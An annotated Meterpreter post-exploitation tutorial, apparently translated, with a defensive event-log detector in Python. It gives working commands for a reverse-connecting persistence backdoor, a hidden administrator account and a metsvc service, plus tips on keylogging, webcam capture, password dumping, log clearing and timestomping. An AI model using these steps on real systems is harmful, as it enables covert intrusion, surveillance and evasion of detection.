Once a reverse shell has given us a session, maintaining persistent control of the target host means we do not have to re-run the attack every time we want a meterpreter session.
1. Using the persistence module
The persistence module installs a permanent backdoor on the target machine. Even if the target patches the vulnerability one day, we can still control it through this connection.
Common parameters:
-X start automatically at boot
-i interval in seconds between connection attempts
-p port for the reverse connection
-r IP address for the reverse connection
Full help for persistence:
meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.
OPTIONS:
-A Automatically start a matching exploit/multi/handler to connect to the agent
-L <opt> Location in target host to write payload to, if none %TEMP% will be used.
-P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt> Alternate executable template to use
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i <opt> The interval in seconds between each connection attempt
-p <opt> The port on which the system running Metasploit is listening
-r <opt> The IP of the system running Metasploit listening for the connect back
Example: run persistence -X -i 11 -p 6220 -r 192.168.1.104
Then use exploit/multi/handler, configure the module to match, and start listening.
2. Create a hidden user on the target host
Get a remote command-line shell on the target host.
If this fails, the target host may restrict access to cmd.exe; use migrate to inject into an administrator user's process and try again.
Enter the following in cmd:
# create a user (the $ suffix hides the created account from the user listing)
net user test$ 123456 /add
# add the created user to the administrators group
net localgroup administrators test$ /add
3. Via the metsvc service
Run: run metsvc
This registers Meterpreter in the target host's service list as a service that starts automatically at boot. Run: run metsvc -r
to uninstall the Meterpreter service from the target host.
Meterpreter help information
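Each of the three persistence methods above leaves a trace in the Windows event logs: a `$`-suffixed account appears in a 4720 (user account created) event, its promotion in a 4732 (member added to a local group) event, and a Meterpreter service or a service whose image lives in the default %TEMP% drop location in a 7045 (new service installed) event. The following Python detector is an added example, not part of the original notes or of Metasploit; it scans constructed, simplified key=value renderings of those events (my own format, not a real log export) and reports the findings a defender would want to see.

```python
"""Detect event-log traces of the persistence techniques described above.

Added example. The event records are constructed, simplified key=value
renderings of Windows Security/System events, not real log exports.
"""
import re
from typing import Dict, List

# Constructed sample events: one record per string, key=value pairs separated by spaces.
SAMPLE_EVENTS = [
    r"EventID=4720 Channel=Security SubjectUserName=alice TargetUserName=bob",
    r"EventID=4720 Channel=Security SubjectUserName=alice TargetUserName=test$",
    r"EventID=4732 Channel=Security SubjectUserName=alice MemberName=test$ TargetUserName=Administrators",
    r"EventID=4732 Channel=Security SubjectUserName=alice MemberName=bob TargetUserName=Remote Desktop Users",
    r"EventID=7045 Channel=System ServiceName=Meterpreter ImagePath=C:\Users\alice\AppData\Local\Temp\metsvc.exe",
    r"EventID=7045 Channel=System ServiceName=Spooler ImagePath=C:\Windows\System32\spoolsv.exe",
    r"EventID=7045 Channel=System ServiceName=Updater ImagePath=C:\Windows\Temp\svc.exe",
]

# A value runs until the next " key=" token or the end of the record, so values may contain spaces.
KV_RE = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|\s*$)")
# Service images under any Temp directory (the persistence module's default drop location is %TEMP%).
TEMP_PATH_RE = re.compile(r"\\temp\\", re.IGNORECASE)


def parse_event(line: str) -> Dict[str, str]:
    """Parse one 'key=value key=value ...' record into a dict."""
    return {key: value for key, value in KV_RE.findall(line)}


def check_event(ev: Dict[str, str]) -> List[str]:
    """Return the findings for one parsed event (empty list if nothing suspicious)."""
    findings: List[str] = []
    eid = ev.get("EventID")
    actor = ev.get("SubjectUserName", "?")

    # 4720: account created. A trailing $ hides a local account from the `net user` listing.
    # Caveat: domain computer accounts also end in $, so apply this to workstation Security logs.
    if eid == "4720" and ev.get("TargetUserName", "").endswith("$"):
        findings.append(f"hidden-style local account created: {ev['TargetUserName']} by {actor}")

    # 4732: member added to a security-enabled local group; Administrators is the group to watch.
    if eid == "4732" and ev.get("TargetUserName", "").lower() == "administrators":
        findings.append(f"member added to Administrators: {ev.get('MemberName', '?')} by {actor}")

    # 7045: new service installed (System log). Flag Meterpreter/metsvc artifacts and Temp-resident images.
    if eid == "7045":
        name = ev.get("ServiceName", "")
        path = ev.get("ImagePath", "")
        if "meterpreter" in name.lower() or "metsvc" in path.lower():
            findings.append(f"service with Meterpreter/metsvc artifact installed: {name} -> {path}")
        elif TEMP_PATH_RE.search(path):
            findings.append(f"service image under a Temp directory: {name} -> {path}")
    return findings


def scan(records: List[str]) -> List[str]:
    """Parse and check every record, returning all findings in log order."""
    findings: List[str] = []
    for line in records:
        findings.extend(check_event(parse_event(line)))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print("ALERT:", finding)
```

Run against the constructed records it reports four alerts: the test$ account creation, its addition to Administrators, the Meterpreter service, and the unrelated service whose image sits under C:\Windows\Temp. Note that the `$` trick only hides the account from `net user`; Computer Management, `Get-LocalUser`, and the 4720 event itself still show it, which is why the account-creation event is the better place to look.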
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session # put the current session in the background (later use sessions -i <id> to interact with it again)
bgkill Kills a background meterpreter script # kill a background meterpreter script
bglist Lists running background scripts # list background scripts
bgrun Executes a meterpreter script as a background thread # run a script as a background thread
channel Displays information or control active channels
close Closes a channel # close a channel
disable_unicode_encoding Disables encoding of unicode strings # disable unicode encoding
enable_unicode_encoding Enables encoding of unicode strings # enable unicode encoding
exit Terminate the meterpreter session # end the meterpreter session, same as quit
get_timeouts Get the current session timeout values # get the current session's timeout values
guid Get the session GUID
help Help menu
info Displays information about a Post module # view information about a post module
irb Drop into irb scripting mode # enter Ruby scripting mode
load Load one or more meterpreter extensions # load an extension, e.g. load mimikatz to read plaintext passwords from the compromised host directly instead of running hashdump and then cracking the hashes
machine_id Get the MSF ID of the machine attached to the session
migrate Migrate the server to another process # process migration (process injection): together with the ps command, inject into a process running with SYSTEM privileges, escalating from the administrator account to SYSTEM
pivot Manage pivot listeners
quit Terminate the meterpreter session # end/terminate/exit the meterpreter session, same as exit
read Reads data from a channel
resource Run the commands stored in a file # run the commands stored in a file
run Executes a meterpreter script or Post module # run a meterpreter script or post module
sessions Quickly switch to another session # sessions
set_timeouts Set the current session timeout values # set the current session's timeout values
sleep Force Meterpreter to go quiet, then re-establish session.
transport Change the current transport mechanism
use Deprecated alias for "load" # load a meterpreter extension; alias for load, now deprecated
uuid Get the UUID for the current session
write Writes data to a channel
Stdapi: File system Commands # file system commands
# Linux-style file commands entered at the meterpreter prompt act on the compromised target by default, e.g. pwd, getwd, ps, cat; only the variants marked with an l (lpwd, getlwd) act on the local Kali machine
============================
Command Description
------- -----------
cat Read the contents of a file to the screen # show the contents of a file on the target, e.g. cat c:\\111.txt
cd Change directory # change the working directory
checksum Retrieve the checksum of a file # get the checksum of a file
cp Copy source to destination # copy a file to a destination
dir List files (alias for ls)
download Download a file or directory # download a file from the target to the local Kali machine, e.g. download c:\\1111.txt /root
edit Edit a file # edit a file on the target with vim, e.g. edit c:\\xxx.txt
getlwd Print local working directory # get the local Kali working directory (local working directory), same as lpwd
getwd Print working directory # get the working directory on the target, same as pwd
lcd Change local working directory # change the local Kali working directory
lpwd Print local working directory # print the local Kali working directory (local print working directory), same as getlwd
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory # print the working directory on the target, same as getwd
rm Delete the specified file
rmdir Remove directory
search Search for files
show_mount List all mount points/logical drives
upload Upload a file or directory # upload a local file or directory to the remote target
Stdapi: Networking Commands
===========================
Command Description
------- -----------
arp Display the host ARP cache
getproxy Display the current proxy configuration
ifconfig Display interfaces # view IP addresses
ipconfig Display interfaces # view IP addresses
netstat Display the network connections # show network connections
portfwd Forward a local port to a remote service # port forwarding: e.g. when the target is on an internal network, forward port 3389 directly with this command instead of uploading extra port-forwarding tools such as nc or lcx
resolve Resolve a set of host names on the target
route View and modify the routing table # view or modify the target's routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
clearev Clear the event log # clear the event logs on the target machine
drop_token Relinquishes any active impersonation token. # drop the token: stop impersonating the current token
execute Execute a command # execute a command or file, e.g. execute -f cmd.exe -i runs cmd.exe interactively
getenv Get one or more environment variable values
getpid Get the current process identifier # view the current process id (pid) on the target, i.e. the pid of the reverse shell payload
getprivs Attempt to enable all privileges available to the current process # enable as many privileges as possible
getsid Get the SID of the user that the server is running as
getuid Get the user that the server is running as # view the privileges on the target, same as whoami
kill Terminate a process # kill/terminate a process, e.g. kill 123 kills the process with pid 123 (use ps to find the pid)
localtime Displays the target system's local date and time # local time of the target system
pgrep Filter processes by name # process grep: filter (search) processes by name
pkill Terminate processes by name # terminate processes by name
ps List running processes # process list
reboot Reboots the remote computer # reboot the target
reg Modify and interact with the remote registry # interact with the target's registry: create, delete, query, etc.
rev2self Calls RevertToSelf() on the remote machine # call RevertToSelf() on the target, returning to the original user account under which the session started
shell Drop into a system command shell # drop into the target's system command shell, e.g. cmd on Windows, bash on Linux
shutdown Shuts down the remote computer # shut down
steal_token Attempts to steal an impersonation token from the target process # steal the token from a SYSTEM-privileged target process and impersonate it, escalating to SYSTEM; similar to migrate
suspend Suspends or resumes a list of processes
sysinfo Gets information about the remote system, such as OS # view the remote target's system information: computer name, OS, architecture, language, domain, number of logged-on users, and the type of payload running on the target
Stdapi: User interface Commands # user interface commands
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations # list all accessible desktops
getdesktop Get the current meterpreter desktop # get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle # idle time: how long the target has been idle
keyscan_dump Dump the keystroke buffer # dump the keystroke buffer (keylogger output)
keyscan_start Start capturing keystrokes # start capturing keystrokes
keyscan_stop Stop capturing keystrokes # stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop # take a screenshot of the target; the file is saved automatically on the local Kali machine
setdesktop Change the meterpreters current desktop # switch to another user interface (depends on which users are logged in)
uictl Control some of the user interface components # control/take over the target's keyboard and mouse
Stdapi: Webcam Commands # webcam commands (note: to watch the target's screen in real time, run vnc)
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Priv: Elevate Commands # privilege escalation commands
======================
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system. # attempt to escalate privileges to SYSTEM
Priv: Password database Commands # password database commands
================================
Command Description
------- -----------
hashdump Dumps the contents of the SAM database # dump the password hashes from the SAM database (hashed form, still need cracking); the run hashdump and run smart_hashdump scripts are stealthier
Priv: Timestomp Commands
========================
Command Description
------- -----------
timestomp Manipulate file MACE attributes # manipulate or modify a file's MACE attributes, e.g. change a file's creation time (anti-forensics)